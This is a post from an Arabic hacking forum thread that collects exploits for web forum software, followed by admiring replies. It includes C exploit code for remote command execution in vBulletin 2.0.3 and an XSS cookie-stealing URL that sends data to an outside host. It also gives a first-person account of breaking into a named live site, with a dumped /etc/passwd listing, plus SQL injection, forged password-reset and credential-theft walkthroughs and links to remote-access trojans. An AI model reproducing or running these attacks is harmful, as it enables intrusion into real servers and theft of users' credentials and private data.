char *prog;
char tmp[2];
char tmp2[4];
char cmd_buf[501];
char encoded_cmd[501];
char data[1024];
char output[20480]; /* 20k recv buf */
struct sockaddr_in addr;
struct hostent *he;
struct sigaction action;
FILE *f;
memset(&tmp, '\0', sizeof(tmp));
memset(&tmp2, '\0', sizeof(tmp2));
memset(&cmd_buf, '\0', sizeof(cmd_buf));
memset(&encoded_cmd, '\0', sizeof(encoded_cmd));
memset(&data, '\0', sizeof(data));
memset(&output, '\0', sizeof(output));
prog = argv[0];
fprintf(stderr, "\t ---[ vb_cal.c\n");
fprintf(stderr, "\t ---[ vBulletin 2.0.3 and before Calendar exploit\n");
fprintf(stderr, "\t ---[ c0ded by st0ic\n");
fprintf(stderr, "\t -- http://www.fsix.net/n");
if (argc < 5 || argc > 12)
usage(prog);
while ( (c = getopt(argc, argv, "h:d:u:t:v")) != -1 )
{
switch(c)
{
case 'h': /* host */
{
host = optarg;
break;
}
case 'd':
{
date = optarg;
break;
}
case 'u': /* url path */
{
path = optarg;
break;
}
case 'p': /* port */
{
port = atoi(optarg);
break;
}
case 't': /* connect timeout */
{
timeout = atoi(optarg);
break;
}
case 'v':
{
verbose = 1;
break;
}
default:
usage(prog);
}
}
/* make sure we got the required stuff */
if (host == NULL)
usage(prog);
else if (date == NULL)
usage(prog);
if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
perror("socket()");
exit(1);
}
if ( (he = gethostbyname(host)) == NULL)
{
perror("gethostbyname()");
exit(1);
}
bzero(&addr, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr = *( (struct in_addr *)he->h_addr);
addr.sin_port = htons(port);
bzero(&action, sizeof(action));
action.sa_handler = (void *)time_out;
action.sa_flags = 0;
sigaction(SIGALRM, &action, 0);
alarm(timeout);
if ( connect(sockfd, (struct sockaddr *)&addr, sizeof(addr)) == -1)
{
perror("connect()");
exit(1);
}
alarm(0);
printf("\\q to exit cmd prompt\n");
while(1)
{
printf("cmd> ");
fgets(cmd_buf, sizeof(cmd_buf), stdin);
for (x = 0; x < strlen(cmd_buf); x++)
if (cmd_buf[x] == '\n')
cmd_buf[x] = '\0';
if ( (cmd_buf[0] == '' && cmd_buf[1] == 'q') )
exit(0);
for (x = 0; x < strlen(cmd_buf); x++)
{
tmp[0] = cmd_buf[x];
/* 0 - 9 */
if ( (cmd_buf[x] >= 0 && cmd_buf[x] <= 9) )
strncat(encoded_cmd, tmp, sizeof(encoded_cmd));
/* A - Z */
else if ( (cmd_buf[x] >= 65 && cmd_buf[x] <= 90) )
strncat(encoded_cmd, tmp, sizeof(encoded_cmd));
/* a - z */
else if ( (cmd_buf[x] >= 97 && cmd_buf[x] <= 122) )
strncat(encoded_cmd, tmp, sizeof(encoded_cmd));
/* everything not a letter or number */
else
{
snprintf(tmp2, sizeof(tmp2), "%c%X", sign, cmd_buf[x]);
strncat(encoded_cmd, tmp2, sizeof(encoded_cmd));
}
}
/* use HTTP/1.1 in order to send valid HTTP commands to virtual hosts */
snprintf(data, sizeof(data), "GET %s%s%s%s%s%s HTTP/1.1\nHost: %s\n\n", path, url1,
date, url2, encoded_cmd, url3, host);
/* be verbose about the string we're sending in case we need to debug. */
if (verbose == 1)
printf("\nSending: %s", data);
send(sockfd, data, sizeof(data), 0);
if ( (f = fdopen(sockfd, "r+") ) == NULL)
{
perror("fdopen()");
exit(1);
}
while(1)
{
fgets(output, sizeof(output), f);
if (feof(f) != 0)
break;
else
printf("%s", output);
memset(&output, '\0', sizeof(output));
}
memset(&cmd_buf, '\0', sizeof(cmd_buf));
memset(&encoded_cmd, '\0', sizeof(encoded_cmd));
memset(&data, '\0', sizeof(data));
memset(&output, '\0', sizeof(output));
fclose(f);
if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
perror("socket()");
exit(1);
}
alarm(timeout);
if ( connect(sockfd, (struct sockaddr *)&addr, sizeof(addr)) == -1)
{
perror("connect()");
exit(1);
}
alarm(0);
}
return 0;
}
-----------------------------------
منقول من موقع أمريكي يالي بدو يترجو يحط ترجمتوا بالموضوع هذا
______________________________
ثغرة vBulletin
quote:
--------------------------------------------------------------------------------
Originally posted by MAKS:
Within the first few lines of code in memberlist.php, the variable $letterbits is evaluated. Because of the way PHP initializes variables, we can inject HTML or JavaScript into the document. So by directing a user to, for example:
http://vulnerable/forum/memberlist....E********='
http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord%
2Ephp%3F****%3D%27%2B
escape%28document%2E*****e%29%3C%2Fscript%3E
(NOTE: The URL should be on a one line)
You can steal the user's password hash and user id. Because of the way vBulletin parses URLs, the above will not function inside the forum, but if we put this in an off-site html file:
<script>
******** = "http://www.vbulletin.com/forum/memb...t%3E********%3D
%27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Freco
rd%2Ephp%3F****%3D%27
%2Bescape%28document%2E*****e%29%3C%2Fscript%3E"
***********
And then link to it instead, the exploit will work as intended. The user doesn't even have to be aware of what has transpired, the above link will proceed first to the memberlist w/*****e stealing code, and then http://www.swgmotu.com./
With the recorded user id and password hash, we can access the site:
http://www.vbulletin.com/forum/index.php?bbuserid=[userid]&bbpassword=[password hash]
-----------------------------------------------------------------------------------
منقول من موقع امركي
--------------------------------------------------------------------------------
ثغرة في منتديات vbulletin 2.0.3
بسم الله الرحمن الرحيم
الثغرة وظيفتها ببساطة انها تسمحلك تنفذ اوامر على الجهاز زي البي اتش بي شيل
فرحنا انا و صاحبي لاعز صديق للهكر الاخ قوقل و قلناله جبلنا مواقع شغالة على
vbulletin 2.0.3
طبعا ما قصر قوقل و جبلنا لسته فاخترنا وحدة منهم و كان الموقع هو
http://www.romulus2.com/ <بعرف اني حاندم على اني حطيت الموقع بس يللا مو مشكلة>
و طبقنا الثغرة ظهر الشكل
http://www.romulus2.com/forum/calen...001-8-15&comma=";echo%20'';%20echo%20`<command>%20`;die( );echo"
و مكان <command> نحط الامر الي بدنا ياه
فاول شي قلنا خلينا نعرف مين نحنا فحطينا
whoami
و الي طلع
انا استبشرت خير على الاقل مني nobody
فقلت خليني اخد نظرة على ملف الباسوورد و اشوف المواقع على السيرفر فحطيت
cat /etc/passwd مكان <command>
و طلع
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0perator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/:
gtd:x:501:100::/home/gtd:/bin/bash
majordomo:x:504:103::/home/majordomo:/bin/bash
quota25:*:505:1::/home/quota25:
quota50:*:506:1::/home/quota50:
quota75:*:507:1::/home/quota75:
quota100:*:508:1::/home/quota100:
quota150:*:509:1::/home/quota150:
quota300:*:510:1::/home/quota300:
quota2:*:511:1::/home/quota2:
quota5:*:512:1::/home/quota5:
quota10:*:513:1::/home/quota10:
msql:x:497:100::/home/msql:/bin/bash
userquota:x:503:100:quota:/home/userquota:/bin/bash
johnv:*:516:1::/home/johnv:
minerva:x:514:516::/home/minerva:/bin/bash
taosfineart:x:517:517::/home/taosfineart:/bin/bash
technoasylum:x:518:518::/home/technoasylum:/bin/bash
ward-tech:x:519:519::/home/ward-tech:/bin/bash
malio:x:522:522::/home/malio:/bin/bash
cindyland:x:529:529::/home/cindyland:/bin/bash
mathom-house:x:532:532::/home/mathom-house:/bin/bash
libertywebhosting:x:534:534::/home/libertywebhosting:/bin/bash
bonfiglioreed:x:537:537::/home/bonfiglioreed:/bin/bash
oldtymespizza:x:539:539::/home/oldtymespizza:/bin/bash
dogshowjournal:x:546:545::/home/dogshowjournal:/bin/bash
surfclassic:x:550:549::/home/surfclassic:/bin/bash
thomason-development:x:552:551::/home/thomason-development:/bin/bash
james:x:553:534::/home/james:/bin/emailonly
alexr:x:554:534::/home/alexr:/bin/emailonly
god:x:555:522::/home/god:/bin/emailonly
sales:x:556:522::/home/sales:/bin/bash
info:x:557:522::/home/info:/bin/emailonly
ryugen:x:558:552::/home/ryugen:/bin/bash
allanart:x:566:559::/home/allanart:/bin/bash
womensphotoworks:x:573:564::/home/womensphotoworks:/bin/bash
mbaentry:x:576:567::/home/mbaentry:/bin/bash
omahasoaring:x:577:568::/home/omahasoaring:/bin/bash
talvee:x:582:549::/home/talvee:/bin/emailonly
mobilewashenvironmental:x:585:572::/home/mobilewashenvironmental:/bin/bash
mobilewashservices:x:589:576::/home/mobilewashservices:/bin/bash
ocdeaf:x:591:578::/home/ocdeaf:/bin/bash
foxfire-goldens:x:592:579::/home/foxfire-goldens:/bin/bash
finchair:x:594:580::/home/finchair:/bin/bash
americanabatement:x:595:581::/home/americanabatement:/bin/bash
whiskersgraphics:x:596:582::/home/whiskersgraphics:/bin/bash
ronemous:x:604:568::/home/ronemous:/bin/emailonly
parrotranch:x:605:588::/home/parrotranch:/bin/bash
erlefamily:x:606:589::/home/erlefamily:/bin/ftponly
parduhn:x:610:593::/home/parduhn:/bin/bash
riptideproductions:x:616:596::/home/riptideproductions:/bin/bash
kaialece:x:626:604::/home/kaialece:/bin/bash
zeeksystems:x:627:605::/home/zeeksystems:/bin/bash
trevor:x:630:596::/home/trevor:/bin/emailonly
dino:x:631:522::/home/dino:/bin/emailonly
loconsigo:x:632:608::/home/loconsigo:/bin/bash
delamerevineyard:x:643:613::/home/delamerevineyard:/bin/bash
michael:x:652:605::/home/michael:/bin/emailonly
jereme:x:654:596::/home/jereme:/bin/emailonly
windows-tips:x:655:624::/home/windows-tips:/bin/bash
ghost-ride:x:657:626::/home/ghost-ride:/bin/bash
cprltd:x:663:629::/home/cprltd:/bin/bash
batmanandbarbie:x:673:636::/home/batmanandbarbie:/bin/bash
housegroove:x:674:637::/home/housegroove:/bin/bash
washglass:x:675:638::/home/washglass:/bin/bash
djmattson:x:676:639::/home/djmattson:/bin/bash
statecapitols:x:677:640::/home/statecapitols:/bin/bash
kanjiweb:x:678:641::/home/kanjiweb:/bin/bash
freevg:x:681:644::/home/freevg:/bin/bash
writersresource:x:682:645::/home/writersresource:/bin/bash
evilgraphics:x:684:647::/home/evilgraphics:/bin/bash
magdalenhsuli:x:690:650::/home/magdalenhsuli:/bin/bash
antioch:x:704:659::/home/antioch:/bin/bash
lifelinks:x:705:660::/home/lifelinks:/bin/bash
sinecos:x:707:662::/home/sinecos:/bin/bash
dosdonas:x:711:666::/home/dosdonas:/bin/bash
accuratelegalprocessingse:x:713:668::/home/accuratelegalprocessingse:/bin/bash
jc:x:716:581::/home/jc:/bin/emailonly
jo:x:717:581::/home/jo:/bin/emailonly
infoaai:x:719:581::/home/infoaai:/bin/emailonly
gypsytejas:x:721:671::/home/gypsytejas:/bin/bash
j-j-c:x:724:674::/home/j-j-c:/bin/bash
camp:x:726:660::/home/camp:/bin/emailonly
marinabaypark:x:740:677::/home/marinabaypark:/bin/bash
gypsy:x:741:671::/home/gypsy:/bin/emailonly
meg:x:749:593::/home/meg:/bin/emailonly
huwe:x:751:679::/home/huwe:/bin/bash
ultimateautomotive50:x:753:681::/home/ultimateautomotive50:/bin/bash
socceracademypa:x:755:683::/home/socceracademypa:/bin/bash
phoenixfamilymuseum:x:761:689::/home/phoenixfamilymuseum:/bin/bash
videoteacher:x:762:690::/home/videoteacher:/bin/bash
spiffydesign:x:765:693::/home/spiffydesign:/bin/bash
nawaf:x:766:694::/home/nawaf:/bin/bash
ccdump:x:768:696::/home/ccdump:/bin/bash
drwizard-atlanta:x:772:700::/home/drwizard-atlanta:/bin/bash
showme-powerchutes:x:777:705::/home/showme-powerchutes:/bin/bash
shellmandanceacademy:x:778:706::/home/shellmandanceacademy:/bin/bash
samelec:x:779:707::/home/samelec:/bin/bash
pet-odor:x:780:708::/home/pet-odor:/bin/bash
michael1:x:781:593::/home/michael1:/bin/emailonly
mmnursereview:x:785:710::/home/mmnursereview:/bin/bash
franksland:x:787:712::/home/franksland:/bin/bash
gr8gifts4u:x:801:717::/home/gr8gifts4u:/bin/bash
globalintercultural:x:806:718::/home/globalintercultural:/bin/bash
gotcher-belote:x:807:719::/home/gotcher-belote:/bin/bash
francisengineering:x:808:720::/home/francisengineering:/bin/bash
befree2:x:814:726::/home/befree2:/bin/bash
barclay:x:821:689::/home/barclay:/bin/emailonly
airupdate:x:823:732::/home/airupdate:/bin/bash
stream:x:825:734::/home/stream:/bin/bash
strantech:x:826:735::/home/strantech:/bin/bash
newcityftp:x:832:740::/home/newcityftp:/bin/bash
nagomifan:x:833:741::/home/nagomifan:/bin/bash
gecko:x:834:671::/home/gecko:/bin/emailonly
chooseyourlife:x:838:745::/home/chooseyourlife:/bin/bash
binarytech:x:839:746::/home/binarytech:/bin/bash
<<<طبعا ملف الباس كله طويل لكن حطيته جزء منه مشان تشوفوه>>>>
ممم سيرفر جيد و حطيت نسخة عنه في مكتبة ملفات الباسوورد عندي للذكرى المهم نشوف الموقع اشو حكايته
romulus2:x:997:837::/home/romulus2:/bin/bash
اووووه حركات يوصل ل /bin/bash
االمهم فكرت كيف حناخد الباسوورد حق هدا الموقع
صاحبي قلي شوف الشادو قلتلو لا تتعب نفسك الشادو هذي الايام مخفي ايام زماااااااااااااااان
فقلت خلص نشوف الكونفيق و ان شاء الله يكون صاحب الموقع غبي و حط نفس الباس
من ملف الباسوود لاحظت انه الملف هو
/home/romulus2
و في طريقة تانية انك تكتب pwd
كتبت و طلع
/home2/www/romulus2/forum
اذا هذا هو مكان ملفات الموقع الصحيحة و اضفت لها
/admin/config.php
فصار الامر
cat /home2/www/romulus2/forum/admin/config.php
_________________
-------------------------
ثغرة مجلة phpnuke
ثغرة مجلة phpnuke
http://www.example.com/modules.php?...iewforum&forum='%20OR%201=1%20INTO% 20OUTFILE%20'[/path]/vf.txt'/*
تضع بدلا http://www.example.com/ أسم الموقع الذي تريده
اختراق منتديات vbzoom
------------------------------------------------
السلام عليكم
شباب انا اقدم لكم اهم ثغره معى الشرح المفصل
<form name="f1" action="http://www.victim.com/vbzoom/register.php" method="POST">
<input type="hidden" name="ChangeProfile" value="1">
User Name: <input type="text" name="UserName"><br>
Password: <input type="text" name="Password"><br>
Email: <input type="text" name="Email">
<input type="hidden" name="HomePage" value="lamerZ">
<input type="hidden" name="VBZooMForum*******UserName" value="false">
<input type="hidden" name="VBZooMForum*******UserName" value="false">
<input type="submit" value="reset password">
</form
<form name="f1" action="هنا تضع وصله الموقع " method="POST">
<input type="hidden" name="ChangeProfile" value="1">
User Name: <input type="text" name="UserName"><br>
Password: <input type="text" name="Password"><br>
Email: <input type="text" name="Email">
<input type="hidden" name="HomePage" value="lamerZ">
<input type="hidden" name="VBZooMForum*******UserName" value="false">
<input type="hidden" name="VBZooMForum*******UserName" value="false">
<input type="submit" value="reset password">
</form
وبعد ان تحط وصل الموقع
تسويه في صفحه html
وتكتب اسم الادمين والباسورد الجديده وايميل جديد
تحياتي
_________________
ثغرة في منتديات من نوع XMB
--------------------------------------------------------
بسم الله الرحمن الرحيم
طريقة الاختراق :
ثغرة جديدة في منتديات من نوع XMB
الشرح والتطبيق
1- عليك بالذهاب الى موقع جو http://www.google.com/
2- اكتب في منطقة البحث XMB 1.6 Magic Lantern Final
3- سوف ترى منتديات كثييييييييره اكثرها مصابه بهذه الثغره لكن رجاااء
لاتقرب المنتديات العربية وعليك بتحذيرها من الثغره الموجوده.
4- اضغط على اي منتدى وقم بكتابة الكلمة التالية بعد عنوان المنتدى
index_log.log يعني راح يكون زي كده
http://www.******.com/massegboard/index_log.log
5- راح ينزل عندك ملف والملف عباره عن ملف زي الكوكيز كبير وفيه اسماء
المستخدمين والباسورد وأشياء ثانيه ماتهمنا.
6- الأن عليك بالبحث في المنتدى عن اسم المدير وذلك بالذهاب الى المواضيع
وتشوف الأسماء والي تلقى تحت اسمه ادمن ستريتور انسخ اسمه.
7- افتح الملف الي نزلته من الموقع وسوي بحث عن اسم المدير راح يجيك هيك مثلا:
xmbuser=admin
والباسورد راح تلقاه قدامه زي كذه
xmbpw=1faeb6747a31c854800ddf3c62b1717a
8- طبعا الباسورد في هذه الحاله مشفر وفك التشفير صعب لهذا الغرض قامت شركة
CCI بتصميم برنامج يقوم بهذا الغرض وهذه وصلت البرنامج
ftp://www.cafecounterintelligence.com/cci/chigger.exe
افتح البرنامج وفي :
رقم (1) قم بوضع علامة صح.
رقم (2) قم بوضع اسم العضو سواء مدير او غيره
رقم (3) قم بوضع الباسورد المشفر حق العضو او المدير او غيره
رقم (4) قم بوضع علامة صح.
رقم (5) قم بوضع البروكسي الي تريده اوالبروكسي حق مزوده الخدمه حقك
رقم (6) قم بوضع المنفذ حق البروكسي
10- بقي شيء واحد بعد اتمام الأعدادات حقت البرنامج بقي ان تذهب الى
المتصفح انترنت اكسبلورر > اضغط بالزر اليمين> الأتصالاات> اعدادات>
قم بوضع البروكسي هذا 127.0.0.1> والمنفذ 8080
11- بعد ذلك اذهب للمنتدى المستهدف وتجول فيه وكأنك المدير تبع المنتدى
وسوي الي بدك ياه
ها ها ها ها
أرجو أن ينال هذا الدرس إعجابكم
هذا الدرس هام جدا جدا جدا لكل الهاكرز بجميع مستوياتهم
linkin park
10-18-2006, 07:02 AM
شرح اختراق الاجهزه عن طريق البرامج
Sub7 شرح رائع لبرنامج مع وصله لتحميل البرنامج
http://www.amman-dj.com/vb/showthread.php?t=8012
------------------------------------------------------------------
شرح بتفصيل الممل برنامج ProratS.EV1.9 للمبتدئين
http://www.amman-dj.com/vb/showthread.php?t=8082
------------------------------------------------------------------
اقوى برنامج اختراق فالعالم Z-dem0n مع الشرح بالصور
http://www.amman-dj.com/vb/showthread.php?t=8013
------------------------------------------------------------------
رعد الكعبي
01-12-2007, 01:47 AM
انت بطل على هذا الشرح المهول والله يوفقك
رعد الكعبي
01-12-2007, 01:50 AM
بس بدون زحمه عليك مديحمل عندي ديطلعلي كتابات يمكن بالتركي وماكو لا سيف او داون لود ...رجاءا
SaMoO
01-12-2007, 09:18 AM
موضوع راااائع
يسلمو يا حلو
فعلا شرح قيم
تحياتي
morhaf007
08-25-2007, 07:44 AM
wanderful
رائع جدا يا لينك
عن جد شي رهيب
شكرا لك شكرا
linkin park
08-25-2007, 07:22 PM
مشكوووورين على مروركم الجميل
تحياتي
M@TR!X
08-31-2007, 11:14 PM
شرح سهل وسريع بس بدك حدا يفهمو وكل هاي الشغلات عاديه ب النسبه الي
أشكرك على الموضوع
linkin park
10-11-2007, 06:29 PM
طيب الله يقويك
شكرا على المرور
تحياتي
linkin park
10-11-2007, 06:40 PM
طيب الله يقويك
شكرا على المرور
تحياتي
الله يعطيك الف عافيه على هالجهد ،
ومشكور يالغالي ،
vBulletin® v3.8.7, Copyright ©2000-2013, Jelsoft Enterprises Ltd.
LinkBacks Enabled by vBSEO